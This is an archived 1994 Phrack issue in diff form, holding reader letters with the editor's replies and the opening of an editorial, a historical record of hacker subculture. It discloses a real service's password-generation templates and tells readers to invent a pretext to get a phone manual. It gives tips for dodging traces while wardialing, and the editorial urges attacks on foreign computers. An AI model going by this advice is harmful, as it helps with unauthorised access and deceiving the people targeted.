+ friends.
+
+ My story is a bit more convoluted.  You can sum it up by saying, if you
+ interfere with my businesses, I'll try my best to track you down and turn
+ you in.  I guess I am a nark.]
+
+------------------------------------------------------------------------------
+
+I read in the last Phrack (45) that you wanted someone to write a few
+words on scrambling systems. Give me a rough outline of what you want
+and I'll see if I can help :-) Basically I wrote the Black Book
+(European Scrambling Systems 1,2,3,4,5 and World Satellite TV &
+Scrambling Methods) and also edit Hack Watch News & Syndicated
+HackWatch. They all deal with scrambling system hacks as opposed to
+computer hacking & phreaking. (Things are a bit iffy here as regards
+phreaking as all calls are logged but the eprom phone cards are easy
+to hack) Oh yeah and another claim to fame ;-) if you can call it
+that, is that I was quoted in an article on satellite piracy in
+"Wired" August issue.
+
+This Hawkwind character that you had an article from in Phrack43
+sounds like a *real* hacker indeed :-> Actually there is an elite in
+Ireland but it is mainly concerned with satellite hacking and that
+Hawkwind character is obviously just a JAFA (Irish hacker expression
+- Just Another Fu**ing Amateur). Most of the advanced telco stuff is
+tested in the south of the country as Dublin is not really that
+important in terms of comms - most of the Atlantic path satellite
+comms gear and brains are on the south coast :-)
+
+Actually the Hawkwind article really pissed off some people here in
+Ireland - there were a few questions asked on my own bbs (Special
+Projects +353-51-50143) about this character. I am not even sure if
+the character is a real hacker or just a wannabe - there were no
+responses from any of his addresses. SP is sort of like the neutral
+territory for  satellite and cable hacking information in Europe
+though there are a few US callers. With the way things are going with
+your new DBS DirecTv system in the US, it looks like the European
+satellite hackers are going to be supplying a lot of information
+(DirecTv's security overlay was developed by News Datacom - the
+developers of the totally hacked VideoCrypt system here in Europe).
+
+There telco here uses eprom phone cards. These are extremely easy to
+hack (well most real hackers in .IE work on breaking satellite
+scrambling systems that use smart cards) as they are only serial
+eprom.
+
+Regards
+
+[About the satellite information:  YES!  Write the biggest, best
+ article the whole fucking hacker world has ever seen about
+ every aspect of satellite tv!!  Personally, I'm more interested in
+ that than anything else anyone could possibly write (seeing as how
+ I'm about to buy a dish for both C and Ku).
+
+ About Hawkwind's article on hacking in Ireland:  If I were to write
+ an article about hacking in America, it would be entirely different
+ than anyone else in America would write.  A country is a big place.
+ Just because someone else's hacking experience is different than
+ your own, it's no reason to discredit them.  However, if your
+ exposure to the scene in Ireland is so completely different than
+ Hawkwind's, I would LOVE to print it as well.]
+
+------------------------------------------------------------------------------
+
+The Columbus Freenet uses a password generating routine that takes the
+first and last initial of the user's real name, and inserts it into a randomly
+chosen template.  Some of the templates are:
+
+E(f)www5(l)
+(f)22ww5(l)    where f and l are first and last initials
+(f)2ww97(l)
+(f)2ww95(l)
+
+and so on.  There are not too many of these templates, I guess maybe 50.
+I imagine most people go in and change their password right away, but
+then again that's what a prudent person would do (so they probably don't).
+
+Columbus 2600 meetings:
+
+Fungal Mutoid-sysop of The KrackBaby BBS (614-326-3933) organized the
+first 2600 meetings in Columbus, unfortunately hardly anyone shows up...
+I don't know why HP is so dead in Central Ohio, but fear and paranoia
+run rampant.
+That's all for now...keep up with the good work!
+
+R.U.Serius?!
+
+[Hmmm...templates are always a bad thing. All one has to do is get the
+ program that generates them, and viola, you've got a pre-made dict file
+ for your crack program.  Not very smart on the part of the Freenet,
+ but hacking a Freenet, is like kicking a puppy.
+
+ I hope more people go to your 2600 meetings.  The ones here in Austin
+ kinda died out too.  Maybe our cities are just lame.]
+
+------------------------------------------------------------------------------
+
+A complaint:  That piece about McDonald's in Phrack 45 was, in a word, LAME.
+Surely Phrack can do better.  Maliciousness for its own sake isn't very
+interesting and frankly the article didn't have any ideas that a bored
+13-year-old couldn't have thought up--probably written by one.
+
+That aside, I found some good stuff in there.  Some of it was old news,
+but Phrack serves an archival purpose too, so that was ok.  On a more
+personal note, I could really relate to your account of HoHoCon--not that
+I was there, just that I have started to feel old lately even though I don't
+turn 25 for another 2 days  :)  Sometimes I feel myself saying things like
+"Why, sonny, when I was your age the Apple II was king..."
+
+Keep up the good work, and don't let the lamers get you down.
+
+[Thanks for the letter.  I personally thought the McDonald's file was
+ a laugh riot.  Even if it was juvenile and moronic, I wouldn't expect
+ anyone to analyze it and go through with anything it contained.  It was
+ just for fun.  Lighten up :)
+
+ I am glad to see that at least someone else recognizes that Phrack
+ is attempting to serve as an archive of our subculture, rather than just
+ a collection of technical info that will be outdated overnight, or a
+ buglist that will be rendered mostly unusable within hours of release.
+
+ There is so much going on within the community, and it is becoming such a
+ spectacle in the popular media, that in 20 years, we can all go back and
+ look at Phrack and remember the people, places, and meetings that
+ changed the face of the net.
+
+ Or maybe I'm just terribly lame, and either 1) refuse to put in the
+ good stuff, 2) don't have access to the good stuff, 3) exist only as a
+ puppet agent of The Man, or 4) Don't know nothin' 'bout Telco!
+ But you know what they say about opinions.]
+
+----------------------------------------------------------------------------
+
+I have a few comments on your editorial in Phrack 44 (on information
+wants to be free).  Thanks for voicing an opinion that is shared by many
+of us.  I am glad to see a public figure in the CuG with nutz enuff to
+actually come out and make such a statement and mean it.
+Again, thanks.
+
+Now on the subject of hacking as a whole.  Is it just me, or are the number
+of losers on the increase?  There have always been those who would try
+and apply these skills to ripoff scams and system trashing but now that
+seems to be the sole intent of many of the "hackers" I come into contact
+with.  What ever happened to hacking to learn more about the system.  To
+really hack a system (be it phone, computer), is a test of skill and
+determination, and upon success you walk away with a greater understanding
+of the machine and its software.  Hacking is more than just knowing how
+to run crack on a filched password file, or using some exploitation
+scripts picked up on IRC, it is a quest for knowledge and gaining
+superiority over a system by use of great skill acquired by a deliberate
+effort.  Once was a time when things like toll fraud (I do miss blue
+boxes) were a means to an end, now they seem to be the end in itself.
+
+Also, I am researching info on OSI comsec procedures and have found some
+really interesting goodies, if you are interested in publishing
+my piece when completed, let me know..
+
+[(NOTE:  This came from a .mil)
+ Man, I'm glad to see that people in the armed forces still have minds
+ of their own.  Not many people would express such a thing openly.
+
+ Yes, the destructive/profit-motivated trends of many of the hackers of
+ today are pretty sad.  But you have to realize, as the technology
+ becomes more and more like consumer electronics, rather than the
+ traditional mold of computer as scientific research tool, an entirely
+ different market segment will be exposed to it and use the technology
+ for less than scrupulous means.
+
+ Even the act of hacking itself.  Today, I can basically gain access
+ to any model of system known to man by asking.  I realize that
+ there are many who cannot accomplish such a thing, but with the
+ proliferation of public access sites, almost everyone can afford
+ access to the net to explore and learn.  The point comes down to this:
+ if you have an account on a Sun, why do you need an account on a Sun
+ at Boeing, unless you either 1) want to sell the cad files of the 777 to
+ Airbus or McDonnell-Douglas 2) want to get financial information to
+ make a killing on Wall Street, or 3) just want to have an ego boost
+ and say "I OWN BOEING!"
+
+ Personally, I can understand the ego boost aspect, but I've decided that
+ I'd much rather get paid by a company like Boeing to hack for them
+ than against them.  I don't want to sell anyone's info, so hacking
+ into any company is basically useless to me, unless they are paying me
+ to look for potential weaknesses.
+
+ Granted, it's not an easy market to get into, but it's a goal to
+ shoot for.
+
+ And for those who find it impossible to quit due to fear of losing
+ their edge, check out my editorial in this issue for a possible
+ solution.]
+
+------------------------------------------------------------------------------
+
+I am looking for a Macintosh app that does the same thing as an app
+called "Demon Dial" that has been lost in the annals of software
+history due to the fact that some people (sysops) question whether it
+is illegal software (it dials up a series of phone #'s looking for data
+connections).  Do you know where I could find an application for the Mac
+that does this simple function?
+
+[We had a guy ask in an earlier issue for Macintosh hacking/phreaking
+ apps.  Noone responded.  Hell, I know SOMEONE has to use a Mac
+ out there.  Are you Mac-weenies all embarrassed to speak up?
+
+ Hell, uuencode and email me your aps, and I'll put them up for
+ ftp!  Help out your poor fellow Macintosh users.  I certainly
+ would if I could, but the thought of touching a Mac gives me the
+ chills.]
+
+------------------------------------------------------------------------------
+
+Have you ever heard of being denied access to your own cell phone?
+I am currently in the process of buying a cell phone and was informed
+that I COULD NOT have the programming guide of the security code
+they enter to program my phone.  In my opinion the key word is "MY."
+If I get a digital security system for my house you better damn well
+figure I will have the security codes for that.  The phone was a Motorola
+flip phone.  I called Motorola and explained how displeased I was with
+this company and they said they could not interfere with a reps. policy.
+When I was selling car phone we kept the programming guide unless they
+asked for it.  I demanded it and they laughed in my face.  Who said
+"the customer is always right" anyway?
+
+Thanks, any info is greatly appreciated.  By the way, you wouldn't
+happen to have the CN/A number for 815 would you?  Also, any ANAC
+would be very helpful.
+
+[Well, I hate to say it, but you got typical service from your
+ cellular agent.  Let's face it, these sales reps probably knew
+ about as much about that programming manual as I do nuclear
+ physics:  "Its confusing, but if you understand it, you can fuck
+ things up."
+
+ I am surprised that Motorola wouldn't sell you the book though.
+ Motorola will sell anybody anything.  You probably called the wrong
+ place.  Moto is so huge they've got multiple groups working on somewhat
+ similar technologies with absolutely no communication between the groups.
+ Sometimes they are in different countries, but sometimes they are in the
+ same city!  I would suggest you call a local FAE (Field Applications
+ Engineer)
+ and get them to get the book for you.  Make up some story about
+ working on some computer controlled application with the phone, and that
+ you need any and all documentation on the phone.  They'll do it.  Money
+ is money.
+
+ As far as the 815 CNA, hell, just call the business office.  I haven't
+ called a CNA in years, only the business office.  They are nice people.
+ And no PINs.
+
+ 815 ANAC:  ok guys, someone must have one...email it!
+
+ "The customer is always right"  wasn't in Bartlett's or Columbia's
+ books of famous quotations.  I guess that phrase has been written out of out
+ history.  So, from now on you aren't always right, I guess.]
+
+------------------------------------------------------------------------------
+
+Dear Phrack:
+
+
+We want you!
+
+We want you to be a part of our cutting edge documentary that is traversing
+across the "NEW EDGE" of computers, culture, and chaos.
+
+Working in conjunction with Douglas Rushkoff, the best selling author of
+"CYBERIA,"  we are currently gathering together the leaders of this
+technological and cultural revolution.  This is not a documentary in the
+traditional sense of the word.  It is more of an exploration, a journey, a
+unique vision of the world as seen through the eyes of those who live on the
+bleeding edge; where technology, art, science, music, pleasure, and new
+thoughts collide.  A place people like you and me like to call home.
+
+"New Edge" will deliver a slice of creativity, insanity, and infallibility,
+and feed those who are hungry for more than what Main Street USA has to
+offer.  This project will detonate across the US and around the world.  It
+will become the who's who of the new frontier and you belong on it's
+illustrious list of futurians.  Please look over the enclosed press release
+description of the project.
+
+Phrack has long been the ultimate source for hack/phreak info, and helped to
+push the limits of free speech and information.  The role that Phrack has
+played in the Steve Jackson Games Case set an important precedent for
+CyberLaw.  We will also be interviewing several people from the EFF.
+
+Please call me ASAP to schedule an interview for "New Edge", or send me
+E-Mail.
+
+Sincerely,
+
+Todd LeValley
+Producer, N E W   E D G E
+(310) 545-8138  Tel/Fax
+belief@eworld.com
+
+
+  W E L C O M E
+   T O   T H E
+    W O R L D
+   O N   T H E
+  E D G E   O F
+T H E  F U T U R E
+
+
+  W E L C O M E
+   T O   T H E
+ N E W   E D G E
+-the documentary-
+
+
+T h e  O r g a n i z a t i o n
+
+Belief Productions in association with Film Forum.
+
+T h e   M i s s i o n
+
+Journey through the labyrinth of cyberia and experience the people, places
+and philosophy that construct cyberspace and the shores of the technological
+frontier.  This fast paced visual voyage through the digital revolution will
+feature interviews with the innovators, artists, cyberpunks, and visionaries
+from all sides of the planet.  These specialists are the futurists who are
+engineering our cybergenic tomorrow in laboratories today.  Along the way we
+will investigate the numerous social and political issues which are cropping
+up as each foot of fiber optic cable is laid.  Artificial intelligence, the
+Internet, nanotechnology, interactive media, computer viruses, electronic
+music, and virtual reality are just a few of the many nodes our journey will
+explore.
+
+T h e   F u n d i n g
+
+This exploration is sponsored in part by a grant from The Annenberg
+Foundation in association with the LA based non-profit cutting-edge media
+group Film Forum.
+
+T h e   P r o c e s s
+
+The New Edge project will capture moving images with a variety of input
+devices and then assemble them into one fluid documentary using Apple
+Macintosh Quadras & PowerMac computers.  The post production work will be
+done entirely on the computers using the Radius Video Vision Telecast Board
+in conjunction with Quicktime software applications such as Adobe Premiere
+4.0 and CoSA After Effects 2.01.  The final piece will be recorded to BETACAM
+SP videotape for exhibition and distribution.  The capture formats for the
+project will include: BETACAM SP, Super VHS, Hi-8, 16MM Film, Super-8 Film,
+35MM Stills, and the Fisher
+Price Pixelvision 2000.
+
+T h e   R e s u l t s
+
+New Edge will pride itself on an innovative visual and aural style which
+before today, could only be created on high-end professional video systems
+and only for short format spots.  The New Edge documentary will be two hours
+in length and will have a dense, layered look previously featured only in
+much shorter pieces.  New Edge will be a showcase piece not only for the
+content contained within, but for the way in which the piece was produced.
+ It will be a spectacular tribute to the products and technology involved in
+its creation.
+
+D i s t r i b u t i o n
+
+Direct Cinema - Distributes videos to Libraries, Schools, and Universities
+throughout the United States.
+
+Mico Entertainment/NHK Enterprises - Provider of American programming for
+Japanese Television.
+
+Labyrinth Media Ltd. - European reality-based documentary distributor
+
+T h e   A u d i e n c e
+
+New Edge is aimed at both the technophiles and technophobes alike.  While the
+show will feature very complex and sophisticated topics, the discussions will
+be structured to appeal to both those who do and do not have the technical
+framework that underlines the cyberian movement.  The show's content and
+style will make it readily available to the MTV and Generation X demographic
+groups as well as executives who want to stay on top of the latest
+technological advances.  Individuals who read Mondo 2000 and Wired magazine
+will also naturally latch on to this electronic
+presentation of their favorite topics.
+
+T h e   G u i d e s
+
+Mike Goedecke - Director/Graphic Designer
+Mike was the Writer/Director/Cinematographer for the Interplay CD-ROM game
+entitled Sim City.  Acting as graphic designer for the Voyager Co.- Criterion
+Laser Disc Division his work is featured on titles such as: Akira, DEVO-The
+Truth About De-Evolution, The Adventures of Baron Munchausen, and Spartacus.
+ Most recently he collaborated with Los Angeles Video Artist Art Nomura on a
+video installation piece entitled Digital Mandala.  The piece was edited,
+composited , and mastered to Laser Disc using an Apple Macintosh Computer and
+off-the-shelf software.  The installation is scheduled to tour museums and
+art galleries across the United States and Europe.  While attending
+Cinema/Television Graduate School at the University of Southern California,
+Mike directed the award winning documentary short Rhythm, which celebrates
+various musical cultures.
+
+Todd LeValley - Producer/Graphic Designer
+Todd is the Producer/Director of CyberCulture: Visions From The New Edge, a
+documentary that introduces the electronic underground.  This project has
+been warmly received at numerous "Cyber Festivals" around the country, as
+well as at the Director's Guild Of America, and is currently being
+distributed by FringeWare Inc.  Todd's commercial experience includes being
+the in-house graphic designer for Barbour/Langley Productions  designing,
+compositing, and producing the graphic packages for several 20th Century Fox
+Television pilots and The Sci-Fi Trader for the USA Network/Sci-Fi Channel.
+ Todd is a graduate of the Cinema/Television program at Loyola Marymount
+University.
+
+Jeff Runyan - Cinematographer/Editor
+Jeff received an MFA from the University of Southern California's Graduate
+School of Cinema/Television with an emphasis in cinematography and editing.
+ He studied cinematography under the guidance of Woody Omens, ASC. and Earl
+Rath, ASC., and editing with Edward Dmytryk.  Jeff was the cinematographer on
+the award wining documentary Rhythm.  He has recently completed shooting and
+editing a documentary on Academy Award winning Cinematographer Conrad Hall
+for the ASC and has just finished directing a short film for USC
+Teleproductions.
+
+Douglas Rushkoff - Cyber Consultant/Author
+Douglas is the author of the best selling Harper Collins San Francisco novel,
+Cyberia.  He spent two years of his life living among the key players in the
+cyber universe.  Douglas knows the New Edge well and is providing us with the
+map to its points of interest, rest stops and travelers.
+
+For more information, please contact:
+Todd LeValley, Producer
+Belief Productions
+(310) 545-8138
+belief@eworld.com
+
+[Dear New Edge:
+
+ You have got to be kidding me.  "Readers of Wired and Mondo 2000 will
+ naturally latch on to this electronic presentation of their favorite
+ topics?"
+
+ Aren't we awful fucking high on ourselves?  Christ.  Mondo & Wired
+ readers and writers (and stars) are themselves so fucking far removed
+ from the real meat of the underground, that they wouldn't
+ even be able to relate to it.  Obviously this "documentary"
+ is going to be aimed at the wannabes who sit at home furiously
+ masturbating to "Cyborgasm" while installing FRACTINT, being very
+ careful not to soil their copy of "The Hacker Crackdown."  Oh joy.
+
+ These guys are so fucking out of it, they sent me two letters.
+ One addressed to Phrack, the other to Phrack / Emmanuel Goldstein.
+ Maybe they think we're 2600.
+
+ CYBER-COUNT:  12 occurrences.
+
+ That's kind of low.  I'm surprised your public relations people didn't
+ have you add in a few more cyber-this's or cyber-that's into the
+ blurb.  Gotta keep that cyber-count high if you want to get those
+ digi-bucks out of those cyberians!  CYBER!!!
+
+ Read my review of Cyberia guys...find a new pop-fad to
+ milk for cash.]
+
+------------------------------------------------------------------------------
+
+In less than 3 weeks, I will be leaving for Basic Training.  Once out of
+there, I will be working on Satellite Data Transmissions for the US
+Army.  I am highly excited, just waiting to see what type of computers
+I will be working on.  Anyways, I will be enrolled in a 32-week
+accelerated technical class teaching me all about satellites, and
+the computers that I will be using.  Here's the kick.  I'll be writing
+a series of Tech Journals detailing the workings/operations of/weaknesses,
+and the use of the systems.  I was wondering if you would be interested
+in carrying these.  I've read Phrack for a long time, but it is an off
+the wall subject.  I'll also be playing with the military phone system,
+in hopes of finding out what the ABCD tones do.  (I heard from a file
+that Military phones utilize them but I'm still a civilian, and am
+clueless).
+
+Thanks for keeping me informed
+Kalisti!
+
+[Sorry to hear about your impending Basic Training.  I'm not big on
+ the military, as they would make me chop off all my hair.
+
+ About the Satellite systems:  YES  If you do indeed find time to write
+ up any files on how they work, systems involved, weaknesses, etc.
+ I'D LOVE TO PRINT THAT!  Just make sure you don't blow your clearance.
+
+ Satellites are very cool.  I'm about to buy a Ku Band disk to do some
+ packet radio type stuff.  A bit low-tech compared to the Army, but hell,
+ I'm on a budget.
+
+ ABCD...they are used for prioritizing calls on AUTOVON.  FTS doesn't
+ use them (I think), and they can only be used on certain lines.
+
+ They are:
+
+ A = priority
+ B = priority override
+ C = flash
+ D = flash override
+
+ For instance, if you want to make it known that this is an important
+ call, you hit the "a" button before dialing.  It establishes a
+ priority-class call, which may cause a light to come on or something
+ as equally attention grabbing at the called party's end.  Priority
+ calls cannot be interrupted, except by a Priority Override" etc,
+ with Flash Override being the highest class.
+
+ If you do these from an improper line, you will get an error message.
+ The one I used to get when BS'ing AUTOVON op's long ago
+ was "The President's use of this line is not authorized." Funny.
+
+ Let me know if any of this is still valid.]
+
+
+
+------------------------------------------------------------------------------
+
+Dear Phrack,
+The following is a copy of a Toneloc found file my friend got.  As happens
+to my friend a lot the numbers aren't valid. But, you'll see he found at least
+one System 75.  It appears that the 75 had a tracer installed on it already.
+My friend did not get a call back on it, and nothing has been done as far
+as we know.  But, I still wonder -- Is scanning no longer safe?
+
+
+                                        Castor [612]
+
+56X-XXXX  22:57:34 03-Apr-94 C  CONNECT 1200
+
+Login: b
+Password:
+INCORRECT LOGIN
+
+Login: c
+Password:
+INCORRECT LOGIN
+
+56X-XXXX  23:04:12 03-Apr-94 C  CONNECT 1200
+
+c
+ Unknown command error
+Ready
+d
+ Unknown command error
+Ready
+e
+ Unknown command error
+Ready
+b
+ Unknown command error
+Ready
+
+56X-XXXX  23:49:19 03-Apr-94 C  CONNECT 1200
+
+ KEYBOARD LOCKED, WAIT FOR LOGIN
+ [1;24r [1;1H [0J
+
+Login: b
+Password:
+INCORRECT LOGIN
+
+56X-XXXX  01:23:28 04-Apr-94 C  CONNECT 1200
+
+Login: b
+Password:
+INCORRECT LOGIN
+
+Call traced to 612-XXX-XXXX.
+Saving number in security log for further investigation.
+
+[Jeez.  That sure does suck.
+
+ Well, live and learn kiddoes.  1994 is not the time to be hacking
+ by direct dialing local numbers.  It's just not all that smart.
+
+ Caller-ID has been tariffed in a lot of RBOCS.  A lot of modem
+ manufacturers implemented caller-id features into their equipment.
+ Having these features in the equipment means that it won't be long
+ before people redesign all their login programs to make use of
+ these features.  I would.
+
+ I've got an ISDN line.  Every time I call out, the SPID (phone number)
+ of the B channel I'm using is broadcast.  There is nothing I can do
+ about that.  On a remote connection, almost all decent ISDN terminal
+ adaptors have the option to block any SPID they don't know.  They won't
+ even answer the phone, because they receive and interpret the phone
+ number before any session is established.
+
+ Yeah, well, that's ISDN, but it will not take a genius to do a few
+ quick hacks on some linux box and we will suddenly be inundated with all
+ kinds of "security packages" that use modems with Caller-ID.
+
+ Yeah, I know, *67 (or whatever it is) to block the data, or
+ route the call through another carrier so the data won't get passed
+ (10288-NXX-XXXX).  The data is still in the system, just not being
+ transmitted from the switch out to the party being called.
+
+ It amazes me how many really smart people I know have been busted
+ solely because they were hacking local systems and calling them
+ directly.
+
+ Scanning has always been a very tricky subject.  Since you are paying
+ for a phone line, and if you have flat-rate service, you are
+ thereby entitled to call as many numbers as you want.  The big issue
+ a while back was dialing sequentially (which set some telcos on a rampage
+ because call usage patterns looked like telemarketing machines).
+ The other problem is harassment.  One call to an individual is a wrong
+ number.  Two is bordering on harassment.  So, doing a complete scan
+ and calling the carriers back through some other method would be
+ a fairly good idea.  And always have your calls forwarded to a
+ non-working number so the 5,000 assholes who call-return you
+ during the scan won't interfere.
+
+ If you are lucky enough to live in the boonies, you are probably
+ still somewhat safe, but everyone else...be careful.]
+
+------------------------------------------------------------------------------
+
+Phrack-
+
+        I was wondering if anyone has ever done an article on breaking
+Novell Network through a workstation.  I've heard it can be done through
+the SysAdmin computer, but is there a way to find the userlist and
+passwords?  Also how would I go about cleaning up after myself so as to
+not leave a trace on the logs.  I would appreciate a way other than screen
+capture, but if anyone knows of a good boot record booting program to
+do a capture of every key typed that would be great, and maybe it
+could be uuencoded in the next Phrack!
+
+        Thanks again for making the best, ass kickin', a step above the
+rest, brain moving, earth shaking, body shivering, fist shaking, totally
+bitchin', muy excelente, awesome H/P magazine in the whole world!  :)
+
+                        Sincerely,
+
+                               The Warden
+
+[Thanks for the compliments...
+
+ About your question though, I'm not quite sure what you mean.
+ In a NetWare environment there really isn't any userlist and passwords
+ that you can get at.  You can run the syscon utility and look at all the
+ usernames, but not much more.  The passwords are stored in what's known
+ as the "bindery."  These are 3 files in the sys/system directory
+ called NET$OBJ.SYS, NET$VAL.SYS, and NET$PROP.SYS.  If you can
+ pull a password out of those files, I will shit in my hat and eat it.
+
+ Beyond that, yes, a key-capture program is definitely the ideal
+ solution for monitoring activity on a PC workstation.  There is
+ one in this issue.]
+
+
+------------------------------------------------------------------------------
+
+Hi,
+   I've Been reading your magazine for a long time now, my eyes light up when
+I see an advert for a UK BBS with related hacking/phreaking articles or files
+on it, but when I try to ring them they are usually gone.
+I've been searching for ages for BBS's in the UK with these kind of articles
+on them but I've had no luck, Even postings on the USENET had little results.
+I have had a few boards which are shady but they ask unusual questions about
+abiding to rules/laws about hacking then they prompt with fake login and
+registration schemes.
+
+If you have some, could you possibly send or publish a list of shady UK BBS's
+Id be extremely grateful
+
+Cheers,
+
+Steven
+
+[Steven:
+
+ Hell, I don't even know the numbers to any "shady" bulletin boards here
+ in America.  The only UK hacker bbs I knew of in recent years was
+ Unauthorised Access, but I'm sure that's the advert you are referring to.
+
+ Maybe someone else in the UK knows something decent to call over there.
+ Any takers? ]
+
+------------------------------------------------------------------------------
+
+[THE GRADY FILES]
+
+Many of you may remember the NSA Security Manual we published last
+issue.  That single file generated more press and hype than I'd
+seen in a long time.  It was mentioned in several newspapers, it
+appeared on television.  It was ridiculous.  The document is
+available to anyone who can fill out a FIOA request.
+
+Regardless, people went zany.  At first I couldn't figure out
+why everyone was so worked up, and then I caught wind of Grady
+Ward.  Grady had posted the document to the net (with all mention
+of Phrack deleted from it) in several USENET forums alt.politics.org.nsa,
+talk.politics.crypto and comp.org.eff.talk.  Several readers of
+Phrack were quick to jump up and point out that Grady had obtained
+it from the magazine (thanks guys!) which he grudgingly admitted.
+Grady got to be in the spotlight for a while as the Phrack/NSA Handbook
+thread continued to grow.
+
+In the meantime, Grady was either calling, or giving him the
+benefit of the doubt, getting called by an awful lot of press.
+And even more compelling is the way he'd began pronouncing my
+impending federal raid on so many newsgroups.
+
+And of course, I don't have time to read any of that USENET crap
+so I'm oblivious to all of this.  Then I got a message from Grady.
+
+[GRADY WRITES]
+
+You might want to get ready for the FBI
+serving a warrant on you for information
+about the NSA security employee manual
+published in Phrack 45;
+the NSA security people called me about 10 minutes
+ago to talk about how it got on the net.
+
+I being very cooperative, gave him
+your address in Austin.
+
+Grady
+707-826-7715
+
+[I REPLY]
+
+Get a grip.
+
+Nothing that was contained in that file could not
+be obtained through other sources.
+
+
+[GRADY REPLIES]
+
+Just because you did nothing illegal, doesn't mean that
+you won't be annoyed by the FBI.  Generally they will
+be very polite however.
+
+Gripping.  Now what?
+
+[I REPLY]
+
+Ok,
+
+If someone actually did contact you, what was his name and number.
+I will forward that to my lawyer.
+
+[GRADY REPLIES]
+
+I have received your mail regarding "Re: NSA"
+It will be read immediately when I return.
+
+If you are seeking more information on the
+Moby lexical databases, please run
+
+finger grady@netcom.com
+
+for general information or help downloading
+live samples and a postscript version of our
+current brochure via anonymous ftp.
+
+Thanks - Grady Ward
+
+-------------------
+
+He never answered my mail.
+
+------------------------------------------------------------------------------
+
+Dear Sir:
+
+Please refrain from sending such material to this address in the future!
+Since this address has been usubscribed from the Phrack mailing list,
+it means that further mailings are undesirable.
+
+I would also wish to remind you that maintaining lists of people's email
+without consent is quite immoral and devious.  How hypocritical of
+you, who decry all such behavior when it is practiced by corporations
+or governments.
+
+Thank you.
+robbie@mundoe.maths.mu.oz.au
+
+[PHRACK EDITOR ABUSES POWER:
+
+ Dear Sir:
+
+ Please excuse the mailing.  Have you ever heard of a mistake?
+ Have you ever heard of an oversight?
+
+ Is it really that much of an inconvenience for you to hit the "d" key
+ to remove one small piece of unwanted mail?
+
+ This being said, I would also like to invite you to go fuck yourself.
+
+ ** I guess this guy does not like to get unsolicited mail **]
+
+------------------------------------------------------------------------------
+
+You people really piss me off!  You're undermining the fun and
+enjoyment of the rest of the internet users just for your juvenile
+games and illegal activities.  Do you realize how much better off we'd
+be if you all just went away and left the Net to honest people like me?
+There is no place in today's society for a bunch of maladjusted
+paranoid psychotics like yourselves.  Please do all of us users a favor
+and go jump in a river.
+
+Kevin Barnes
+kebar@netcom.com
+
+[ABUSE OF POWER CONTINUES...WILL ERIKB EVER STOP?
+
+ Hey Keith:
+
+ Thanks a lot for the letter!
+
+ You know, it does my heart good to hear from such kind and caring
+ folks like yourself.  It's so fortunate for the Internet that there are
+ people like yourself who take it upon themselves to become martyrs for
+ their causes and express their ideals in such an intelligent manner.
+
+ It's fascinating to me that you can send such email sight-unseen.
+ Do you know who you are writing to?  Do you even have the slightest
+ idea?  What do you hope to accomplish?  Do you have any idea?
+
+ This particular "maladjusted paranoid psychotic" to whom you have so
+ eloquently addressed is an engineer in the R&D of a Fortune 500 computer
+ company, and that along with outside consulting will net me about
+ six-figures this tax year.  I've consulted for telephone companies,
+ governments, aerospace, financial institutions, oil companies (the list
+ goes on...) and quite frankly I don't do anything even remotely illegal.
+ In fact, one recent and quite prominent quote from me was "I only
+ hack for money."
+
+ Now, about the silent majority of "honest people" like yourself that you
+ have so self-rightously chosen to represent...
+
+ I've been using the net since the early 80's (arpa-days) initially
+ through a rms granted guest account on MIT-OZ.  I've continued to
+ work with other Internet Providers to cover the asses of the so-called
+ "honest people" of which you include yourself.
+
+ Now, in my view, if it were not for people like us, who consistently
+ expose and pinpoint weaknesses in the operating systems and networking
+ technologies that you use for your "fun and enjoyment" and that I use
+ for MY JOB, you would continue to be at serious risk.  But, perhaps
+ ignorance is truly bliss, and if so, then Keith, you are probably one of
+ the happiest people on this fine planet.
+
+ Now, per your request, I may just go jump in a river, as the one near
+ my house is quite nice, and it is almost 100 degrees here in Texas.
+ I only ask that you do me one small favor:
+
+ print out 500 copies of this letter, roll them up into a paper fist,
+ and shove them into any orifice on your person that meets your criteria
+ as deserving.
+
+ ** I guess this guy doesn't like me...or you **
+
+ EDITORIAL ABUSE ENDS]
+-----------------------------------------------------------------------------
+
+                              ==Phrack Magazine==
+
+                 Volume Five, Issue Forty-Six, File 2a of 28
+
+****************************************************************************
+
+                                Phrack Editorial
+
+
+If you aren't from America, this editorial really isn't meant for you,
+so read on with warning, or go on to the next file.
+
+-----------------------------------------------------------------------------
+
+Stupid hackers.
+
+We've got to do something to clean up our image.
+
+We truly are "America's Most Valuable Resource," as ex-CIA spook Robert
+Steele has said so many times.  But if we don't stop screwing over our own
+countrymen, we will never be looked at as anything more than common
+gutter trash.  Hacking computers for the sole purpose of collecting
+systems like space-age baseball cards is stupid, pointless and can only
+lead to a quick trip up the river.
+
+Obviously, no one is going to stop hacking.  I've been lucky in that I've
+found people willing to pay me to hack for them rather than against
+them, but not everyone can score such a coup.  What kind of alternative
+can the rest of the community have?
+
+Let's say that everyone was given an opportunity to hack without any
+worry of prosecution with free access to a safe system to hack from,
+with the only catch being that you could not hack certain systems.
+Military, government, financial, commercial and university systems would
+all still be fair game.  Every operating system, every application, every
+network type all open to your curious minds.
+
+Would this be a good alternative?  Could you follow a few simple
+guidelines for the offer of virtually unlimited hacking with no worry of
+governmental interference?
+
+Where am I going with this?
+
+Right now we are at war.  You may not realize it, but we all feel the
+implications of this war, because it's a war with no allies, and
+enormous stakes.  It's a war of economics.
+
+The very countries that shake our hands over the conference tables of
+NATO and the United Nations are picking our pockets.  Whether it be the
+blatant theft of American R&D by Japanese firms, or the clandestine and
+governmentally-sanctioned bugging of Air France first-class seating, or
+the cloak-and-dagger hacking of the SWIFT network by the German BND's
+Project Rahab, America is getting fucked.
+
+Every country on the planet is coming at us.  Let's face it, we are the
+leaders in everything.  Period.  Every important discovery in this
+century has been by an American or by an American company.  Certainly
+other countries have better profited by our discoveries, but
+nonetheless, we are the world's think-tank.
+
+So, is it fair that we keep getting shafted by these so-called "allies?"
+Is it fair that we sit idly by, like some old hound too lazy to scratch
+at the ticks sucking out our life's blood by the gallon?  Hell no.
+
+Let's say that an enterprising group of computer hackers decided to
+strike back.  Using equipment bought legally, using network connections
+obtained and paid for legally, and making sure that all usage was
+tracked and paid for, this same group began a systematic attack of
+foreign computers.  Then, upon having gained access, gave any and all
+information obtained to American corporations and the Federal
+government.
+
+What laws would be broken?  Federal Computer Crime Statutes specifically
+target so-called "Federal Interest Computers." (ie: banks,
+telecommunications, military, etc.)  Since these attacks would involve
+foreign systems, those statutes would not apply.  If all calls and
+network connections were promptly paid for, no toll-fraud or other
+communications related laws would apply.
+
